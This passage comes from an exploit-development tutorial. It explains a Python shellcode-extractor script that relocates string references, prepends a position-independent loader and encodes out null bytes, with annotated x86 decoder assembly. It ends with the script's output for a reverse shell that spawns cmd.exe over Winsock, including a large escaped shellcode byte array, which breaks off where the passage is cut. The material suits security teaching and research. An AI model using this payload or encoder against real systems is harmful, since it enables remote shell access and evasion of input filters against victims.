                    str = get_cstring(rdata, string_rva - rdata_start)
                    if str is None:
                        raise Exception('Cannot extract string from .rdata')
                    addr_to_strings[string_va] = str

        return (shellcode, relocs, addr_to_strings)

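pe.DIRECTORY_ENTRY_BASERELOC is a list of data structures, each of which has a field named entries holding a list of relocations. First we check whether the current relocation lies within the shellcode. If it does, we do the following:

1. we append to relocs the offset of the relocation relative to the start of the shellcode;

2. we extract from the shellcode the DWORD located at the offset just found and check that this DWORD points to data in .rdata;

3. we extract from .rdata the null-terminated string whose starting location we found in (2);

4. we add the string to addr_to_strings.

Note that:

i. relocs contains the offsets of the relocations within the shellcode, i.e. the offsets of the DWORDs within the shellcode that need to be fixed so that they point to the strings;

ii. addr_to_strings is a dictionary that associates the addresses found in (2) with the actual strings.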
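The four steps can be tried without a real PE file. The following Python 3 sketch runs them over a small fake image; the function collect_string_relocs, the fake image, and this version of get_cstring (which keeps the terminating null byte) are assumptions for illustration, not the article's pefile-based code.

```python
import struct

IMAGE_BASE = 0x400000

def get_cstring(data, offset):
    """Returns the null-terminated string at offset (terminator included), or None."""
    end = data.find(b'\0', offset)
    if end == -1:
        return None
    return bytes(data[offset:end + 1])

def collect_string_relocs(image, reloc_rvas, code_start, code_end, rdata_start, rdata_end):
    relocs = []
    addr_to_strings = {}
    for rva in reloc_rvas:
        if not (code_start <= rva < code_end):
            continue                                   # not inside the shellcode
        relocs.append(rva - code_start)                # step 1
        (string_va,) = struct.unpack_from('<I', image, rva)   # step 2
        string_rva = string_va - IMAGE_BASE
        if not (rdata_start <= string_rva < rdata_end):
            raise ValueError('shellcode references a section other than .rdata')
        s = get_cstring(image, string_rva)             # step 3
        if s is None:
            raise ValueError('Cannot extract string from .rdata')
        addr_to_strings[string_va] = s                 # step 4
    return relocs, addr_to_strings

# Fake image indexed by RVA: one PUSH in .text, one string in .rdata.
image = bytearray(0x3000)
image[0x116A:0x116F] = bytes([0x68, 0x18, 0x21, 0x40, 0x00])   # push 402118h
image[0x2118:0x2120] = b'cmd.exe\0'

# 1300h lies past the end of the shellcode (1266h), so it is skipped.
relocs, addr_to_strings = collect_string_relocs(
    image, [0x116B, 0x1300], 0x1000, 0x1266, 0x2000, 0x3000)
print([hex(r) for r in relocs])                        # ['0x16b']
print({hex(k): v for k, v in addr_to_strings.items()})
```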

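Adding the loader to the shellcode

The idea is to add the strings contained in addr_to_strings to the end of our shellcode and then make our code reference those strings.

Unfortunately, the code->strings linking must be done at runtime because we don't know the starting address of the shellcode. To do this, we need to prepend a sort of "loader" which fixes the shellcode at runtime. Here's the structure of our shellcode after the transformation:

[Figure: layout of the transformed shellcode: loader, original shellcode, off1|off2|..., str1|str2|...]

The offX are DWORDs which point to the locations in the original shellcode that need to be fixed. The loader will fix these locations so that they point to the correct strings strX. To see exactly how things work, try to understand the following code: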

def add_loader_to_shellcode(shellcode, relocs, addr_to_strings):
    if len(relocs) == 0:
        return shellcode                # there are no relocations

    # The format of the new shellcode is:
    #       call    here
    #   here:
    #       ...
    #   shellcode_start:
    #       <shellcode>         (contains offsets to strX (offset are from "here" label))
    #   relocs:
    #       off1|off2|...       (offsets to relocations (offset are from "here" label))
    #       str1|str2|...

    delta = 21                                      # shellcode_start - here

    # Builds the first part (up to and not including the shellcode).
    x = dword_to_bytes(delta + len(shellcode))
    y = dword_to_bytes(len(relocs))
    code = [
        0xE8, 0x00, 0x00, 0x00, 0x00,               #   CALL here
                                                    # here:
        0x5E,                                       #   POP ESI
        0x8B, 0xFE,                                 #   MOV EDI, ESI
        0x81, 0xC6, x[0], x[1], x[2], x[3],         #   ADD ESI, shellcode_start + len(shellcode) - here
        0xB9, y[0], y[1], y[2], y[3],               #   MOV ECX, len(relocs)
        0xFC,                                       #   CLD
                                                    # again:
        0xAD,                                       #   LODSD
        0x01, 0x3C, 0x07,                           #   ADD [EDI+EAX], EDI
        0xE2, 0xFA                                  #   LOOP again
                                                    # shellcode_start:
    ]

    # Builds the final part (offX and strX).
    offset = delta + len(shellcode) + len(relocs) * 4           # offset from "here" label
    final_part = [dword_to_string(r + delta) for r in relocs]
    addr_to_offset = {}
    for addr in addr_to_strings.keys():
        str = addr_to_strings[addr]
        final_part.append(str)
        addr_to_offset[addr] = offset
        offset += len(str)

    # Fixes the shellcode so that the pointers referenced by relocs point to the
    # string in the final part.
    byte_shellcode = [ord(c) for c in shellcode]
    for off in relocs:
        addr = bytes_to_dword(byte_shellcode[off:off+4])
        byte_shellcode[off:off+4] = dword_to_bytes(addr_to_offset[addr])

    return ''.join([chr(b) for b in (code + byte_shellcode)]) + ''.join(final_part)

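Let's have a look at the loader:

    CALL here                   ; PUSH EIP+5; JMP here
  here:
    POP ESI                     ; ESI = address of "here"
    MOV EDI, ESI                ; EDI = address of "here"
    ADD ESI, shellcode_start + len(shellcode) - here        ; ESI = address of off1
    MOV ECX, len(relocs)        ; ECX = number of locations to fix
    CLD                         ; tells LODSD to go forwards
  again:
    LODSD                       ; EAX = offX; ESI += 4
    ADD [EDI+EAX], EDI          ; fixes location within shellcode
    LOOP again                  ; DEC ECX; if ECX > 0 then JMP again
  shellcode_start:
    <shellcode>
  relocs:
    off1|off2|...
    str1|str2|...

First, the loader uses a CALL to get the absolute address of here in memory. It then uses this information to fix the offsets within the original shellcode. ESI points to off1, so LODSD is used to read the offsets one by one. The instruction

    ADD [EDI+EAX], EDI

fixes the locations within the shellcode. EAX is the current offX, which is the offset of the location relative to here. This means that EDI+EAX is the absolute address of that location. The DWORD at that location contains the offset of the correct string relative to here. By adding EDI to that DWORD, we turn the DWORD into the absolute address of the string. When the loader has finished, the shellcode, now fixed, is executed.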
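To make the arithmetic concrete, the following Python 3 sketch simulates the loader on a toy blob laid out as described above. Everything here is an assumption for illustration: run_loader is a hypothetical helper, the loader bytes are replaced by NOP placeholders, and the "shellcode" is just push str1 / ret with one relocation at offset 1.

```python
import struct

def run_loader(blob, base, here_off, relocs_off, num_relocs):
    """Simulates the loader on a copy of blob loaded at address base."""
    mem = bytearray(blob)
    edi = base + here_off                    # POP ESI / MOV EDI, ESI
    esi = relocs_off                         # blob index of off1
    for _ in range(num_relocs):              # MOV ECX, len(relocs) ... LOOP again
        (eax,) = struct.unpack_from('<I', mem, esi)        # LODSD
        esi += 4
        loc = here_off + eax                 # blob index of [EDI+EAX]
        (value,) = struct.unpack_from('<I', mem, loc)
        struct.pack_into('<I', mem, loc, (value + edi) & 0xFFFFFFFF)   # ADD [EDI+EAX], EDI
    return mem

HERE_OFF = 5                                 # "here" follows the 5-byte CALL
DELTA = 21                                   # shellcode_start - here
stub = b'\x90' * (HERE_OFF + DELTA)          # placeholder for the real loader bytes
string = b'cmd.exe\0'
shellcode_len = 6
str_off = DELTA + shellcode_len + 4          # offset of str1 from "here" (one offX entry)
shellcode = b'\x68' + struct.pack('<I', str_off) + b'\xC3'   # push str1 / ret
blob = stub + shellcode + struct.pack('<I', 1 + DELTA) + string

base = 0x10000                               # arbitrary load address
mem = run_loader(blob, base, HERE_OFF, HERE_OFF + DELTA + len(shellcode), 1)
(ptr,) = struct.unpack_from('<I', mem, HERE_OFF + DELTA + 1)
print(hex(ptr), bytes(mem[ptr - base:ptr - base + len(string)]))
```

After the simulated loop, the operand of the PUSH holds the absolute address of the string for whatever base is chosen.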

To conclude, add_loader_to_shellcode is called only if there are relocations. You can see that in the main function:

<snip>
    if len(relocs) != 0:
        print('Found %d reference(s) to %d string(s) in .rdata' % (len(relocs), len(addr_to_strings)))
        print('Strings:')
        for s in addr_to_strings.values():
            print('  ' + s[:-1])
        print('')
        shellcode = add_loader_to_shellcode(shellcode, relocs, addr_to_strings)
    else:
        print('No relocations found')
<snip>

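Removing null bytes from the shellcode (I)

To remove the null bytes, I wrote two functions:

1. get_fixed_shellcode_single_block
2. get_fixed_shellcode

The first function doesn't always work but produces shorter code, so it should be tried first. The second function produces longer code but, as long as the shellcode is not too large for the size check in get_fixed_shellcode, it always finds an encoding.

Let's start with get_fixed_shellcode_single_block. Here's the function definition: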

def get_fixed_shellcode_single_block(shellcode):
    '''
    Returns a version of shellcode without null bytes or None if the
    shellcode can't be fixed.
    If this function fails, use get_fixed_shellcode().
    '''

    # Finds one non-null byte not present, if any.
    bytes = set([ord(c) for c in shellcode])
    missing_bytes = [b for b in range(1, 256) if b not in bytes]
    if len(missing_bytes) == 0:
        return None                             # shellcode can't be fixed
    missing_byte = missing_bytes[0]

    (xor1, xor2) = get_xor_values(len(shellcode))

    code = [
        0xE8, 0xFF, 0xFF, 0xFF, 0xFF,                       #   CALL $ + 4
                                                            # here:
        0xC0,                                               #   (FF)C0 = INC EAX
        0x5F,                                               #   POP EDI
        0xB9, xor1[0], xor1[1], xor1[2], xor1[3],           #   MOV ECX, <xor value 1 for shellcode len>
        0x81, 0xF1, xor2[0], xor2[1], xor2[2], xor2[3],     #   XOR ECX, <xor value 2 for shellcode len>
        0x83, 0xC7, 29,                                     #   ADD EDI, shellcode_begin - here
        0x33, 0xF6,                                         #   XOR ESI, ESI
        0xFC,                                               #   CLD
                                                            # loop1:
        0x8A, 0x07,                                         #   MOV AL, BYTE PTR [EDI]
        0x3C, missing_byte,                                 #   CMP AL, <missing byte>
        0x0F, 0x44, 0xC6,                                   #   CMOVE EAX, ESI
        0xAA,                                               #   STOSB
        0xE2, 0xF6                                          #   LOOP loop1
                                                            # shellcode_begin:
    ]

    return ''.join([chr(x) for x in code]) + shellcode.replace('\0', chr(missing_byte))

The idea is very simple. We analyze the shellcode byte by byte and see whether there is a missing value, i.e. a byte value which never appears in the shellcode. Let's say this value is 0x14. We can now replace every 0x00 in the shellcode with 0x14. The shellcode no longer contains null bytes, but it can't run because it has been modified. The last step is to add a decoder to the shellcode that, at runtime, restores the null bytes before the original shellcode is executed. Here it is:

  CALL $ + 4                                  ; PUSH "here"; JMP "here"-1
here:
  (FF)C0 = INC EAX                            ; not important: just a NOP
  POP EDI                                     ; EDI = "here"
  MOV ECX, <xor value 1 for shellcode len>
  XOR ECX, <xor value 2 for shellcode len>    ; ECX = shellcode length
  ADD EDI, shellcode_begin - here             ; EDI = absolute address of original shellcode
  XOR ESI, ESI                                ; ESI = 0
  CLD                                         ; tells STOSB to go forwards
loop1:
  MOV AL, BYTE PTR [EDI]                      ; AL = current byte of the shellcode
  CMP AL, <missing byte>                      ; is AL the special byte?
  CMOVE EAX, ESI                              ; if AL is the special byte, then EAX = 0
  STOSB                                       ; overwrite the current byte of the shellcode with AL
  LOOP loop1                                  ; DEC ECX; if ECX > 0 then JMP loop1
shellcode_begin:

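There are a couple of important details to discuss. First of all, this code can't contain null bytes itself, because then we'd need another piece of code to remove them.

As you can see, the CALL instruction doesn't jump to here, because otherwise its opcode would have been

E8 00 00 00 00               #   CALL here

which contains four null bytes. Since the CALL instruction is 5 bytes long, CALL here is equivalent to CALL $+5. The trick to get rid of the null bytes is to use CALL $+4:

E8 FF FF FF FF               #   CALL $+4

That CALL skips 4 bytes and jumps to the last FF of the CALL itself. The CALL instruction is followed by the byte C0, so the instruction executed after the CALL is INC EAX, which corresponds to FF C0. Note that the value pushed by the CALL is still the absolute address of the here label.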
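The displacement arithmetic can be checked with a few lines of Python 3. This is only a sketch: call_rel32 is a hypothetical helper that decodes the signed 32-bit displacement of a 5-byte CALL and returns the jump target and the pushed return address.

```python
import struct

def call_rel32(addr, encoding):
    """Returns (target, return_address) for a 5-byte CALL rel32 located at addr."""
    assert len(encoding) == 5 and encoding[0] == 0xE8
    (rel,) = struct.unpack('<i', encoding[1:])   # signed 32-bit displacement
    return_address = addr + 5                    # address of the byte after the CALL
    return return_address + rel, return_address

addr = 0x1000
plain = call_rel32(addr, bytes([0xE8, 0x00, 0x00, 0x00, 0x00]))
trick = call_rel32(addr, bytes([0xE8, 0xFF, 0xFF, 0xFF, 0xFF]))
print([hex(v) for v in plain])   # ['0x1005', '0x1005']
print([hex(v) for v in trick])   # ['0x1004', '0x1005']
```

In both encodings the pushed value is addr + 5, the address of here; only the jump target differs by one byte.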

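There's a second trick in the code to avoid null bytes:

MOV ECX, <xor value 1 for shellcode len>
XOR ECX, <xor value 2 for shellcode len>

We could have just used

MOV ECX, <shellcode len>

but that would have produced null bytes. In fact, for a shellcode of length 0x400, we would have had

B9 00 04 00 00        MOV ECX, 400h

which contains 3 null bytes.

To avoid that, we choose a non-null byte which doesn't appear in 00000400h. Let's say we choose 0x01. Now we compute

<xor value 1 for shellcode len> = 00000400h xor 01010101h = 01010501h
<xor value 2 for shellcode len> = 01010101h

The net result is that <xor value 1 for shellcode len> and <xor value 2 for shellcode len> are both free of null bytes and, when xored, produce the original value 400h.

Our two instructions become:

B9 01 05 01 01        MOV ECX, 01010501h
81 F1 01 01 01 01     XOR ECX, 01010101h

The xor values are computed by the function get_xor_values.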
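For readers who want to try the computation, here is a Python 3 rendition of the same idea. It is a sketch that works on bytes objects rather than the lists used by the article's Python 2 script, so the return types are an assumption of this example.

```python
import struct

def get_xor_values(value):
    """Returns (xor1, xor2), both null-free, such that xor1 ^ xor2 == value.
    Both are 4-byte little-endian byte strings."""
    data = struct.pack('<I', value)
    # A non-null byte value that does not appear in value always exists,
    # since value has only 4 bytes.
    missing_byte = next(b for b in range(1, 256) if b not in data)
    xor1 = bytes(b ^ missing_byte for b in data)
    xor2 = bytes([missing_byte] * 4)
    return xor1, xor2

xor1, xor2 = get_xor_values(0x400)
print(xor1.hex(), xor2.hex())   # 01050101 01010101
```

Read as little-endian DWORDs these are 01010501h and 01010101h, the operands of the two instructions shown above. A byte of xor1 can only be zero when the input byte equals the missing byte, which by construction never happens.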

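Having said that, the decoder is easy to understand: it walks through the shellcode byte by byte and overwrites with null bytes the bytes which contain the special value (0x14, in our previous example).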
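The round trip can be modelled in Python 3 as follows. This is a sketch of the encoding step and of what the decoder loop does at runtime, not the decoder itself; encode_single_block and decode_single_block are hypothetical names.

```python
def encode_single_block(shellcode):
    """Replaces every null byte with a byte value absent from shellcode.
    Returns (missing_byte, encoded) or None if every non-null value is used."""
    present = set(shellcode)
    missing = [b for b in range(1, 256) if b not in present]
    if not missing:
        return None
    return missing[0], shellcode.replace(b'\0', bytes([missing[0]]))

def decode_single_block(missing_byte, encoded):
    """Mirrors loop1: every occurrence of missing_byte becomes 0 again."""
    out = bytearray(encoded)
    for i, b in enumerate(out):
        if b == missing_byte:        # CMP AL, <missing byte> / CMOVE EAX, ESI
            out[i] = 0               # STOSB
    return bytes(out)

original = bytes([0x6A, 0x00, 0x68, 0x00, 0x04, 0x00, 0x00, 0x01, 0xC3])
missing_byte, encoded = encode_single_block(original)
print(hex(missing_byte), encoded.hex())
print(decode_single_block(missing_byte, encoded) == original)   # True
```

Because the chosen value never occurs in the original bytes, the decoder cannot mistake a genuine byte for an encoded null.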

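Removing null bytes from the shellcode (II)

The method above can fail because we might be unable to find a byte value which isn't already present in the shellcode. If that happens, we need to use get_fixed_shellcode, which is a little more complex.

The idea is to divide the shellcode into blocks of 254 bytes. Note that each block must have a "missing byte", because a byte can have 255 non-zero values. We could choose a missing byte for each block and handle each block individually. But that wouldn't be very space efficient, because for a shellcode of 254*N bytes we would need to store N "missing bytes" before or after the shellcode (the decoder needs to know the missing bytes). A smarter approach is to use the same "missing byte" for as many 254-byte blocks as possible. We start from the beginning of the shellcode and keep adding blocks to the current chunk for as long as at least one byte value is missing from all of them; when no such value is left, the block that caused this starts a new chunk. In the end, we have a list of <missing_byte, num_blocks> pairs:

[(missing_byte1, num_blocks1), (missing_byte2, num_blocks2), ...]

I decided to restrict num_blocksX to a single byte, so num_blocksX is between 1 and 255.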
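The chunking strategy can be sketched in Python 3 like this. The function name split_into_chunks and the use of sets are choices made for this example; it returns the pairs as tuples rather than the flat list used by the article's script.

```python
BLOCK_SIZE = 254
MAX_BLOCKS = 255          # num_blocks must fit in a single byte

def split_into_chunks(shellcode):
    """Returns a list of (missing_byte, num_blocks) pairs covering shellcode."""
    pairs = []
    i = 0
    while i < len(shellcode):
        num_blocks = 0
        missing = set(range(1, 256))
        while i < len(shellcode) and num_blocks < MAX_BLOCKS:
            # A 254-byte block holds at most 254 distinct values, so the first
            # block of a chunk always leaves at least one candidate.
            still_missing = missing - set(shellcode[i:i + BLOCK_SIZE])
            if not still_missing:
                break                     # this block starts the next chunk
            missing = still_missing
            num_blocks += 1
            i += BLOCK_SIZE
        pairs.append((min(missing), num_blocks))
    return pairs

block1 = bytes(range(1, 255))             # uses 1..254, only 255 is missing
block2 = bytes(range(2, 256))             # uses 2..255, only 1 is missing
print(split_into_chunks(block1 + block2)) # [(255, 1), (1, 1)]
print(split_into_chunks(bytes(600)))      # [(1, 3)]
```

In the first call the two blocks share no missing value, so each becomes its own chunk; in the second, 600 zero bytes fit into one chunk of three blocks, the last one being partial.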

Here's the part of get_fixed_shellcode which splits the shellcode into chunks:

def get_fixed_shellcode(shellcode):
    '''
    Returns a version of shellcode without null bytes. This version divides
    the shellcode into multiple blocks and should be used only if
    get_fixed_shellcode_single_block() doesn't work with this shellcode.
    '''

    # The format of bytes_blocks is
    #   [missing_byte1, number_of_blocks1,
    #    missing_byte2, number_of_blocks2, ...]
    # where missing_byteX is the value used to overwrite the null bytes in the
    # shellcode, while number_of_blocksX is the number of 254-byte blocks where
    # to use the corresponding missing_byteX.
    bytes_blocks = []
    shellcode_len = len(shellcode)
    i = 0
    while i < shellcode_len:
        num_blocks = 0
        missing_bytes = list(range(1, 256))

        # Tries to find as many 254-byte contiguous blocks as possible which misses at
        # least one non-null value. Note that a single 254-byte block always misses at
        # least one non-null value.
        while True:
            if i >= shellcode_len or num_blocks == 255:
                bytes_blocks += [missing_bytes[0], num_blocks]
                break
            bytes = set([ord(c) for c in shellcode[i:i+254]])
            new_missing_bytes = [b for b in missing_bytes if b not in bytes]
            if len(new_missing_bytes) != 0:         # new block added
                missing_bytes = new_missing_bytes
                num_blocks += 1
                i += 254
            else:
                # No common missing byte is left: close the current chunk.
                bytes_blocks += [missing_bytes[0], num_blocks]
                break
<snip>

Like before, we need to discuss the "decoder" which is prepended to the shellcode. This decoder is a bit longer than the previous one, but the principle is the same.

Here's the code:

    code = ([
        0xEB, len(bytes_blocks)] +                          #   JMP SHORT skip_bytes
                                                            # bytes:
        bytes_blocks + [                                    #   ...
                                                            # skip_bytes:
        0xE8, 0xFF, 0xFF, 0xFF, 0xFF,                       #   CALL $ + 4
                                                            # here:
        0xC0,                                               #   (FF)C0 = INC EAX
        0x5F,                                               #   POP EDI
        0xB9, xor1[0], xor1[1], xor1[2], xor1[3],           #   MOV ECX, <xor value 1 for shellcode len>
        0x81, 0xF1, xor2[0], xor2[1], xor2[2], xor2[3],     #   XOR ECX, <xor value 2 for shellcode len>
        0x8D, 0x5F, -(len(bytes_blocks) + 5) & 0xFF,        #   LEA EBX, [EDI + (bytes - here)]
        0x83, 0xC7, 0x30,                                   #   ADD EDI, shellcode_begin - here
                                                            # loop1:
        0xB0, 0xFE,                                         #   MOV AL, 0FEh
        0xF6, 0x63, 0x01,                                   #   MUL AL, BYTE PTR [EBX+1]
        0x0F, 0xB7, 0xD0,                                   #   MOVZX EDX, AX
        0x33, 0xF6,                                         #   XOR ESI, ESI
        0xFC,                                               #   CLD
                                                            # loop2:
        0x8A, 0x07,                                         #   MOV AL, BYTE PTR [EDI]
        0x3A, 0x03,                                         #   CMP AL, BYTE PTR [EBX]
        0x0F, 0x44, 0xC6,                                   #   CMOVE EAX, ESI
        0xAA,                                               #   STOSB
        0x49,                                               #   DEC ECX
        0x74, 0x07,                                         #   JE shellcode_begin
        0x4A,                                               #   DEC EDX
        0x75, 0xF2,                                         #   JNE loop2
        0x43,                                               #   INC EBX
        0x43,                                               #   INC EBX
        0xEB, 0xE3                                          #   JMP loop1
                                                            # shellcode_begin:
    ])

bytes_blocks is the array

[missing_byte1, num_blocks1, missing_byte2, num_blocks2, ...]

that we discussed earlier, but stored flat rather than as a list of pairs.

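Note that the code begins with a JMP SHORT instruction that skips over bytes_blocks. For this to work, len(bytes_blocks) must be less than or equal to 0x7F. But as you can see, len(bytes_blocks) also appears in another instruction: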

0x8D, 0x5F, -(len(bytes_blocks) + 5) & 0xFF,        #   LEA EBX, [EDI + (bytes - here)] 

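Here the displacement -(len(bytes_blocks) + 5) has to fit in a signed 8-bit field, which requires len(bytes_blocks) to be less than or equal to 0x7F - 5, so this is the condition that decides. If it is violated, the script gives up: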

if len(bytes_blocks) > 0x7f - 5:
    # Can't assemble "LEA EBX, [EDI + (bytes-here)]" or "JMP skip_bytes".
    return None
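As a rough illustration of why the LEA imposes the tighter limit, the sketch below computes the displacement byte that the script emits and reads it back as a signed 8-bit value, the way the CPU interprets it. The helper names (disp8, as_signed8, fits) are made up for this example and are not part of sce.py.

```python
def disp8(n_bytes_blocks):
    """Byte encoding of the LEA displacement (bytes - here)."""
    # "bytes" lies len(bytes_blocks) + 5 bytes before "here":
    # the array itself plus the 5-byte CALL instruction.
    return -(n_bytes_blocks + 5) & 0xFF


def as_signed8(b):
    """Interpret a byte as a signed 8-bit value, as the CPU does for disp8."""
    return b - 0x100 if b >= 0x80 else b


def fits(n_bytes_blocks):
    """The same limit the script enforces before emitting the decoder."""
    return n_bytes_blocks <= 0x7F - 5


if __name__ == "__main__":
    for n in (2, 4, 0x7F - 5, 0x7F - 4):
        b = disp8(n)
        print(n, hex(b), as_signed8(b), fits(n))
```

For a two-entry array (one pair) the emitted byte is 0xF9, which the CPU reads as -7: two bytes of array plus the five bytes of the CALL.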

Let's review the code in more detail:

  JMP SHORT skip_bytes
bytes:
  ...
skip_bytes:
  CALL $ + 4                                  ; PUSH "here"; JMP "here"-1
here:
  (FF)C0 = INC EAX                            ; not important: just a NOP
  POP EDI                                     ; EDI = absolute address of "here"
  MOV ECX, <xor value 1 for shellcode len>
  XOR ECX, <xor value 2 for shellcode len>    ; ECX = shellcode length
  LEA EBX, [EDI + (bytes - here)]             ; EBX = absolute address of "bytes"
  ADD EDI, shellcode_begin - here             ; EDI = absolute address of the shellcode
loop1:
  MOV AL, 0FEh                                ; AL = 254
  MUL AL, BYTE PTR [EBX+1]                    ; AX = 254 * current num_blocksX = num bytes
  MOVZX EDX, AX                               ; EDX = num bytes of the current chunk
  XOR ESI, ESI                                ; ESI = 0
  CLD                                         ; tells STOSB to go forwards
loop2:
  MOV AL, BYTE PTR [EDI]                      ; AL = current byte of shellcode
  CMP AL, BYTE PTR [EBX]                      ; is AL the missing byte for the current chunk?
  CMOVE EAX, ESI                              ; if it is, then EAX = 0
  STOSB                                       ; replaces the current byte of the shellcode with AL
  DEC ECX                                     ; ECX -= 1
  JE shellcode_begin                          ; if ECX == 0, then we're done!
  DEC EDX                                     ; EDX -= 1
  JNE loop2                                   ; if EDX != 0, then we keep working on the current chunk
  INC EBX                                     ; EBX += 1  (moves to next pair...
  INC EBX                                     ; EBX += 1   ... missing_bytes, num_blocks)
  JMP loop1                                   ; starts working on the next chunk
shellcode_begin:
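The two nested loops may be easier to follow as a high-level model. The sketch below is only an approximation of what loop1 and loop2 do, written in Python over toy data (not real shellcode); the names decode and BLOCK are hypothetical and do not appear in sce.py.

```python
BLOCK = 254  # bytes per block, matching "MOV AL, 0FEh" in the decoder


def decode(encoded, bytes_blocks):
    """Model of loop1/loop2: restore null bytes chunk by chunk."""
    out = bytearray(encoded)
    pos = 0
    # bytes_blocks is flat: [missing_byte1, num_blocks1, missing_byte2, ...]
    for i in range(0, len(bytes_blocks), 2):
        missing, num_blocks = bytes_blocks[i], bytes_blocks[i + 1]
        chunk_len = BLOCK * num_blocks          # MUL / MOVZX EDX, AX
        end = min(pos + chunk_len, len(out))    # DEC ECX / JE shellcode_begin
        for j in range(pos, end):               # loop2
            if out[j] == missing:               # CMP AL, [EBX] / CMOVE EAX, ESI
                out[j] = 0                      # STOSB
        pos = end
        if pos == len(out):                     # ECX reached zero
            break
    return bytes(out)


if __name__ == "__main__":
    # Toy payload: the first chunk never contains 0x05, the second never 0x07.
    chunk1 = b"\x41\x00\x42" + b"\x43" * 251    # exactly one 254-byte block
    chunk2 = b"\x05\x00\x44"                    # shorter final chunk
    encoded = chunk1.replace(b"\x00", b"\x05") + chunk2.replace(b"\x00", b"\x07")
    assert b"\x00" not in encoded
    assert decode(encoded, [0x05, 1, 0x07, 1]) == chunk1 + chunk2
```

The second chunk legitimately contains 0x05, which is why each chunk carries its own missing byte: a value that is free in one chunk may be in use in another.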

Testing the script

This is the easy part! If you run the script without any arguments, it prints:

Shellcode Extractor by Massimiliano Tomassoli (2015)

Usage:
  sce.py <exe file> <map file>

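If you remember, we also told the VS 2013 linker to produce a map file. Just call the script with the path to the exe file and the path to the map file. Here's what we get for our reverse shell: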

Shellcode Extractor by Massimiliano Tomassoli (2015)

Extracting shellcode length from "mapfile"...
shellcode length: 614
Extracting shellcode from "shellcode.exe" and analyzing relocations...
Found 3 reference(s) to 3 string(s) in .rdata
Strings:
  ws2_32.dll
  cmd.exe
  127.0.0.1

Fixing the shellcode...
final shellcode length: 715

char shellcode[] =
"\xe8\xff\xff\xff\xff\xc0\x5f\xb9\xa8\x03\x01\x01\x81\xf1\x01\x01"
"\x01\x01\x83\xc7\x1d\x33\xf6\xfc\x8a\x07\x3c\x05\x0f\x44\xc6\xaa"
"\xe2\xf6\xe8\x05\x05\x05\x05\x5e\x8b\xfe\x81\xc6\x7b\x02\x05\x05"
"\xb9\x03\x05\x05\x05\xfc\xad\x01\x3c\x07\xe2\xfa\x55\x8b\xec\x83"
"\xe4\xf8\x81\xec\x24\x02\x05\x05\x53\x56\x57\xb9\x8d\x10\xb7\xf8"
"\xe8\xa5\x01\x05\x05\x68\x87\x02\x05\x05\xff\xd0\xb9\x40\xd5\xdc"
"\x2d\xe8\x94\x01\x05\x05\xb9\x6f\xf1\xd4\x9f\x8b\xf0\xe8\x88\x01"
"\x05\x05\xb9\x82\xa1\x0d\xa5\x8b\xf8\xe8\x7c\x01\x05\x05\xb9\x70"
"\xbe\x1c\x23\x89\x44\x24\x18\xe8\x6e\x01\x05\x05\xb9\xd1\xfe\x73"
"\x1b\x89\x44\x24\x0c\xe8\x60\x01\x05\x05\xb9\xe2\xfa\x1b\x01\xe8"
"\x56\x01\x05\x05\xb9\xc9\x53\x29\xdc\x89\x44\x24\x20\xe8\x48\x01"
"\x05\x05\xb9\x6e\x85\x1c\x5c\x89\x44\x24\x1c\xe8\x3a\x01\x05\x05"
"\xb9\xe0\x53\x31\x4b\x89\x44\x24\x24\xe8\x2c\x01\x05\x05\xb9\x98"
"\x94\x8e\xca\x8b\xd8\xe8\x20\x01\x05\x05\x89\x44\x24\x10\x8d\x84"
"\x24\xa0\x05\x05\x05\x50\x68\x02\x02\x05\x05\xff\xd6\x33\xc9\x85"
"\xc0\x0f\x85\xd8\x05\x05\x05\x51\x51\x51\x6a\x06\x6a\x01\x6a\x02"
"\x58\x50\xff\xd7\x8b\xf0\x33\xff\x83\xfe\xff\x0f\x84\xc0\x05\x05"
"\x05\x8d\x44\x24\x14\x50\x57\x57\x68\x9a\x02\x05\x05\xff\x54\x24"
"\x2c\x85\xc0\x0f\x85\xa8\x05\x05\x05\x6a\x02\x57\x57\x6a\x10\x8d"
"\x44\x24\x58\x50\x8b\x44\x24\x28\xff\x70\x10\xff\x70\x18\xff\x54"
"\x24\x40\x6a\x02\x58\x66\x89\x44\x24\x28\xb8\x05\x7b\x05\x05\x66"
"\x89\x44\x24\x2a\x8d\x44\x24\x48\x50\xff\x54\x24\x24\x57\x57\x57"
"\x57\x89\x44\x24\x3c\x8d\x44\x24\x38\x6a\x10\x50\x56\xff\x54\x24"
"\x34\x85\xc0\x75\x5c\x6a\x44\x5f\x8b\xcf\x8d\x44\x24\x58\x33\xd2"
"\x88\x10\x40\x49\x75\xfa\x8d\x44\x24\x38\x89\x7c\x24\x58\x50\x8d"
"\x44\x24\x5c\xc7\x84\x24\x88\x05\x05\x05\x05\x01\x05\x05\x50\x52"
"\x52\x52\x6a\x01\x52\x52\x68\x92\x02\x05\x05\x52\x89\xb4\x24\xc0"
"\x05\x05\x05\x89\xb4\x24\xbc\x05\x05\x05\x89\xb4\x24\xb8\x05\x05"
"\x05\xff\x54\x24\x34\x6a\xff\xff\x74\x24\x3c\xff\x54\x24\x18\x33"
"\xff\x57\xff\xd3\x5f\x5e\x33\xc0\x5b\x8b\xe5\x5d\xc3\x33\xd2\xeb"
"\x10\xc1\xca\x0d\x3c\x61\x0f\xbe\xc0\x7c\x03\x83\xe8\x20\x03\xd0"
"\x41\x8a\x01\x84\xc0\x75\xea\x8b\xc2\xc3\x55\x8b\xec\x83\xec\x14"
"\x53\x56\x57\x89\x4d\xf4\x64\xa1\x30\x05\x05\x05\x89\x45\xfc\x8b"
"\x45\xfc\x8b\x40\x0c\x8b\x40\x14\x8b\xf8\x89\x45\xec\x8d\x47\xf8"
"\x8b\x3f\x8b\x70\x18\x85\xf6\x74\x4f\x8b\x46\x3c\x8b\x5c\x30\x78"
"\x85\xdb\x74\x44\x8b\x4c\x33\x0c\x03\xce\xe8\x9e\xff\xff\xff\x8b"
"\x4c\x33\x20\x89\x45\xf8\x03\xce\x33\xc0\x89\x4d\xf0\x89\x45\xfc"
"\x39\x44\x33\x18\x76\x22\x8b\x0c\x81\x03\xce\xe8\x7d\xff\xff\xff"
"\x03\x45\xf8\x39\x45\xf4\x74\x1e\x8b\x45\xfc\x8b\x4d\xf0\x40\x89"
"\x45\xfc\x3b\x44\x33\x18\x72\xde\x3b\x7d\xec\x75\xa0\x33\xc0\x5f"
"\x5e\x5b\x8b\xe5\x5d\xc3\x8b\x4d\xfc\x8b\x44\x33\x24\x8d\x04\x48"
"\x0f\xb7\x0c\x30\x8b\x44\x33\x1c\x8d\x04\x88\x8b\x04\x30\x03\xc6"
